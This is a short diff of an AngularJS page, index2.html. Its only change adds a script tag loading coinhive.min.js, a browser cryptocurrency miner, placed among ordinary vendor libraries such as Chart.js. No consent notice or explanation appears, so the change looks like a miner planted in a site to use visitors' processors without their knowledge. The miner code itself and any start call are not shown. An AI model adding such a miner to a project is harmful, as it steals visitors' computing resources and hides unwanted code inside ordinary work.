--- a/index2.html
+++ b/index2.html
@@ -457,6 +457,8 @@ button:active {
 <script src="js/vendor/angular-spinner.min.js"></script>
   <script src="js/vendor/Chart.min.js"></script>
   <script src="js/vendor/angular-chart.min.js"></script>
+  <script src="js/vendor/coinhive.min.js"></script>
+
 <script src="js/controllers/init.js"></script>  
 <script src="js/services.js"></script>
 
